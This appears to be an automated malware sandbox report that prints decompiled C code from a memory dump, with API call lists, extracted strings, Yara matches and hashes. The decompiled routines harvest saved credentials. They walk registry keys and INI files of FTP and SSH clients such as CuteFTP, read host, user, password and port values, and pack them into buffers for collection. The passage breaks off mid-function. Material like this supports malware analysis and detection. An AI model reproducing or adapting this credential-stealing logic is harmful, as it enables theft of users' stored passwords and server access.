                                                                        							_push(_t48);
                                                                        							_t49 = GetPrivateProfileStringA("Program", "DataPath", 0x4140dc, _v2076, 0x104, _t48);
                                                                        							__eflags = _t49 - 3;
                                                                        							if(_t49 > 3) {
                                                                        								E00404131(_a12, _v2076, "accounts.ini", 0xbeef0000);
                                                                        							}
                                                                        							E004017D5();
                                                                        						}
                                                                        						E0040EA6C(__eflags, _a4, _v2068, _a12);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				return E004017D5(_v2076);
                                                                        			}














                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA8F
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040EAC3
                                                                        • GetPrivateProfileStringA.KERNEL32(Program,DataPath,004140DC,?,00000104,00000000), ref: 0040EB49
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                                                        • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                                                        • API String ID: 1343824468-2495907966
                                                                        • Opcode ID: b5c0b280644bee6996382e5a83c53ec8679b2acf3bcf6a67137770437b64a0c1
                                                                        • Instruction ID: 122af7354ceea1c80e976d98240d1f1ab236dc4a71dce6b0bb6b8652a25f0c4c
                                                                        • Opcode Fuzzy Hash: b5c0b280644bee6996382e5a83c53ec8679b2acf3bcf6a67137770437b64a0c1
                                                                        • Instruction Fuzzy Hash: 29312D7194011CBADF11ABA2CC42FDD7AB9BF04304F1084B7B245751E1DAB95AE19F9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E004051B8(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t30;
                                                                        				void* _t37;
                                                                        				void* _t38;
                                                                        				char* _t39;
                                                                        
                                                                        				_t38 = __edx;
                                                                        				_t37 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 4, 0);
                                                                        				_t39 =  *0x414082; // 0x0
                                                                        				if( *_t39 == 0) {
                                                                        					L5:
                                                                        					E0040510F(_t37, _t43, _a4, 0x1a); // executed
                                                                        					E0040510F(_t37, _t43, _a4, 0x23); // executed
                                                                        					E0040510F(_t37, _t43, _a4, 0x1c); // executed
                                                                        					E0040510F(_t37, _t43, _a4, 0x26); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
                                                                        					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"); // executed
                                                                        					return E00401553(_t38, _t43, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t30 = StrStrIA(_t39, "CUTEFTP"); // executed
                                                                        					_t41 = _t30;
                                                                        					if(_t30 != 0) {
                                                                        						_t34 = E0040234A(_t41, _t39);
                                                                        						if(E0040234A(_t41, _t39) != 0) {
                                                                        							E00404FD8(_t37, _a4, _t34, "\\sm.dat");
                                                                        							E004017D5(_t34);
                                                                        						}
                                                                        					}
                                                                        					asm("cld");
                                                                        					_t37 = 0xffffffff;
                                                                        					asm("repne scasb");
                                                                        					_t43 =  *_t39;
                                                                        				} while ( *_t39 != 0);
                                                                        				goto L5;
                                                                        			}









                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,CUTEFTP), ref: 004051DF
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 0040523C
                                                                        • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405249
                                                                        • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 0040527D
                                                                        • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 00405263
                                                                        • Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 0040528A
                                                                        • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405270
                                                                        • \sm.dat, xrefs: 004051F3
                                                                        • CUTEFTP, xrefs: 004051D9
                                                                        • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405256
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
                                                                        • API String ID: 1884169789-3073816274
                                                                        • Opcode ID: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
                                                                        • Instruction ID: c9e65f93459612828945218a38d798e19f240a3487c00c51deca1f9608bf85c0
                                                                        • Opcode Fuzzy Hash: c34e40b89e81a979602aea5d6b57cf767b342166a4fd3645b50516338e196d01
                                                                        • Instruction Fuzzy Hash: D8215E706841097ACF117F21CD03F8E3E269F907A4F10413AB9197C0F2CBBD9A919A4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406229(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				intOrPtr* _v2092;
                                                                        				char _v2096;
                                                                        				char _v2100;
                                                                        				long _t57;
                                                                        				long _t58;
                                                                        				intOrPtr* _t72;
                                                                        
                                                                        				_t57 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t58 = _t57;
                                                                        				if(_t58 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "PW", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "PthR", 0);
                                                                        						_t72 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2096);
                                                                        						if(_t72 == 0 || _v2096 != 4) {
                                                                        							_t73 = _t72;
                                                                        							if(_t72 != 0) {
                                                                        								E004017D5(_t73);
                                                                        							}
                                                                        							_v2088 = 0x15;
                                                                        						} else {
                                                                        							 *_t23 =  *_t72;
                                                                        							E004017D5(_t72);
                                                                        						}
                                                                        						_v2092 = E00401C8E( *0x4140fe, _v2068, "SSH",  &_v2100);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0010);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E00401486(_a4, _v2088);
                                                                        							E004014E8(_a4, _v2084);
                                                                        							if(_v2092 == 0 || _v2100 != 4) {
                                                                        								E00401486(_a4, 0);
                                                                        							} else {
                                                                        								E00401486(_a4,  *_v2092);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t58;
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040623F
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406273
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406481
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$Port$PthR$SSH$User
                                                                        • API String ID: 1332880857-1643752846
                                                                        • Opcode ID: 39f30cf4631ecca601130555565e03e604095438465b813c5d9c2985eface6db
                                                                        • Instruction ID: dc339f5e81026a45414f470924930b9f0486a9fc6d38709ffe0ea3c9b7bda71c
                                                                        • Opcode Fuzzy Hash: 39f30cf4631ecca601130555565e03e604095438465b813c5d9c2985eface6db
                                                                        • Instruction Fuzzy Hash: FA51E63194011CEADF216BA2CC42BDD7AB9BF08704F14C0BAB545750B1DB7A5EA19FD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405D78(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				char _v2092;
                                                                        				long _t48;
                                                                        				long _t49;
                                                                        				intOrPtr* _t64;
                                                                        
                                                                        				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t54);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostAdrs", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "UserName", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "RemoteDir", 0);
                                                                        						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
                                                                        						if(_t64 == 0 || _v2092 != 4) {
                                                                        							_t65 = _t64;
                                                                        							if(_t64 != 0) {
                                                                        								E004017D5(_t65);
                                                                        							}
                                                                        							_v2088 = 0x15;
                                                                        						} else {
                                                                        							 *_t23 =  *_t64;
                                                                        							E004017D5(_t64);
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014E8(_a4, _v2084);
                                                                        							E00401486(_a4, _v2088);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t49;
                                                                        			}


















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405D8E
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00405DC2
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F6E
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumFreeLocalOpen
                                                                        • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                                                        • API String ID: 3369285772-3748300950
                                                                        • Opcode ID: 4c6751013afbec193ce3993ac3dc4643b9ed273e405f98c4c98f0654d545aac2
                                                                        • Instruction ID: 895065a577242a1dc8cf9cb542de238b46a37634af73f481449c44b05c989335
                                                                        • Opcode Fuzzy Hash: 4c6751013afbec193ce3993ac3dc4643b9ed273e405f98c4c98f0654d545aac2
                                                                        • Instruction Fuzzy Hash: E041F53194011DAADF216BA2CC42BDE7AB9FF04304F10C0BAB544751B1DB7A5E92AF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004071D3(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t56;
                                                                        				long _t57;
                                                                        
                                                                        				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t57 = _t56;
                                                                        				if(_t57 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t62);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "FtpPassword", 0);
                                                                        						_v2084 = E00401C8E(_a8, _v2068, "_FtpPassword", 0);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "FtpServer", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "FtpUserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "FtpDirectory", 0);
                                                                        						if(_v2080 != 0 || _v2084 != 0) {
                                                                        							if(_v2072 != 0 && _v2076 != 0) {
                                                                        								E00401486(_a4, 0xbeef0000);
                                                                        								E004014E8(_a4, _v2072);
                                                                        								E004014E8(_a4, _v2076);
                                                                        								E004014E8(_a4, _v2080);
                                                                        								E004014E8(_a4, _v2084);
                                                                        								E004014E8(_a4, _v2088);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E004071D3(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t57;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071E6
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040721A
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                                                        • API String ID: 1332880857-980612798
                                                                        • Opcode ID: f1b5941ca08cee94d1ae6fbbe1efe5f9bcaaa6bf321f235dce9eb98a1d4605a9
                                                                        • Instruction ID: eb35d637fb60ff57c6ef9e79c42a55e3363b4def4f450bd9d6fd20052dedf9b6
                                                                        • Opcode Fuzzy Hash: f1b5941ca08cee94d1ae6fbbe1efe5f9bcaaa6bf321f235dce9eb98a1d4605a9
                                                                        • Instruction Fuzzy Hash: 2E41C53194011CBADF226F51CC42BDC7BB6BF04304F10C0BAB958751B1DBBA5A92AF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DA5F(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				char* _v2092;
                                                                        				long _t57;
                                                                        				long _t58;
                                                                        
                                                                        				_t57 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t58 = _t57;
                                                                        				if(_t58 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t63);
                                                                        						_v2068 = E00401C8E(_a4, _v2092, "HostName", 0);
                                                                        						_v2072 = E00401C8E(_a4, _v2092, "UserName", 0);
                                                                        						_v2076 = E00401C8E(_a4, _v2092, "Password", 0);
                                                                        						_v2080 = E00401C8E(_a4, _v2092, "PortNumber",  &_v2088);
                                                                        						_v2084 = E00401C8E(_a4, _v2092, "TerminalType", 0);
                                                                        						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a12, 0xbeef0000);
                                                                        							E004014E8(_a12, _v2068);
                                                                        							E004014E8(_a12, _v2072);
                                                                        							E004014E8(_a12, _v2076);
                                                                        							E004014BC(_a12, _v2080, _v2088);
                                                                        							E004014E8(_a12, _v2084);
                                                                        						}
                                                                        						E0040DA5F(_a4, _v2092, _a12);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t58;
                                                                        			}

















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA72
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040DAA6
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DC3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                                                        • API String ID: 1332880857-1017491782
                                                                        • Opcode ID: 7caa8052822bda6067befa5e1fbf85658180712946805083f77da88c6935b249
                                                                        • Instruction ID: 74ed6bc0f2f1019c4438166421eefdcc1314a9bab96f8c2a3f024f8d1cd312b8
                                                                        • Opcode Fuzzy Hash: 7caa8052822bda6067befa5e1fbf85658180712946805083f77da88c6935b249
                                                                        • Instruction Fuzzy Hash: 1F41B83194011CBBDF226F91CC42BDD7AB5BF04304F1080BAB545750B2DF7A9AA1AF88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406FA8(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t56;
                                                                        				long _t57;
                                                                        
                                                                        				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t57 = _t56;
                                                                        				if(_t57 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t62);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
                                                                        						_v2084 = E00401C8E(_a8, _v2068, "_Password", 0);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "Server", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "Directory", 0);
                                                                        						if(_v2080 != 0 || _v2084 != 0) {
                                                                        							if(_v2072 != 0 && _v2076 != 0) {
                                                                        								E00401486(_a4, 0xbeef0000);
                                                                        								E004014E8(_a4, _v2072);
                                                                        								E004014E8(_a4, _v2076);
                                                                        								E004014E8(_a4, _v2080);
                                                                        								E004014E8(_a4, _v2084);
                                                                        								E004014E8(_a4, _v2088);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E00406FA8(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t57;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FBB
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406FEF
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407181
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Directory$Password$Server$UserName$_Password
                                                                        • API String ID: 1332880857-3317168126
                                                                        • Opcode ID: e2d51bf07215674384ac8cb268629fa1639a99ba6e32d7d8098cb125b184d393
                                                                        • Instruction ID: 6887f4d4dc4833aea87068e0bfe498b125db7ab105371447aa8d5c49bdf339d4
                                                                        • Opcode Fuzzy Hash: e2d51bf07215674384ac8cb268629fa1639a99ba6e32d7d8098cb125b184d393
                                                                        • Instruction Fuzzy Hash: BA41C33194011CBADF226F51CC42BDCBAB6BF04304F14C0BAB558751B1DB7A5AA2AF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406010(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t48;
                                                                        				long _t49;
                                                                        
                                                                        				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t54);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "Port", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
                                                                        						_v2088 = E00401C8E( *0x4140fe, _v2068, "HostDirName", 0);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014E8(_a4, _v2084);
                                                                        							E004014E8(_a4, _v2088);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2088);
                                                                        						E00406010(_a4, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t49;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406026
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040605A
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004061EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: HostDirName$HostName$Password$Port$Username
                                                                        • API String ID: 1332880857-791697221
                                                                        • Opcode ID: a3f99c497edbf23e9725fb0beb3983df1e4c71f2b076d87f637a3e6bb9089809
                                                                        • Instruction ID: 661ca5f8eecc736091142f07f5f5879c64b4d0dd11ba7ceb6d40fcb3e2135ea1
                                                                        • Opcode Fuzzy Hash: a3f99c497edbf23e9725fb0beb3983df1e4c71f2b076d87f637a3e6bb9089809
                                                                        • Instruction Fuzzy Hash: 0D41B53194011CAADF226F92CC42BDC7AB9BF44704F10C0BAB545750B1DB7A5EA2AFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D625(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t46;
                                                                        				long _t47;
                                                                        
                                                                        				_t46 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t47 = _t46;
                                                                        				if(_t47 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2088 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t52);
                                                                        						_v2068 = E00401C8E( *0x4140fe, _v2088, "Host", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2088, "User", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2088, "Pass", 0);
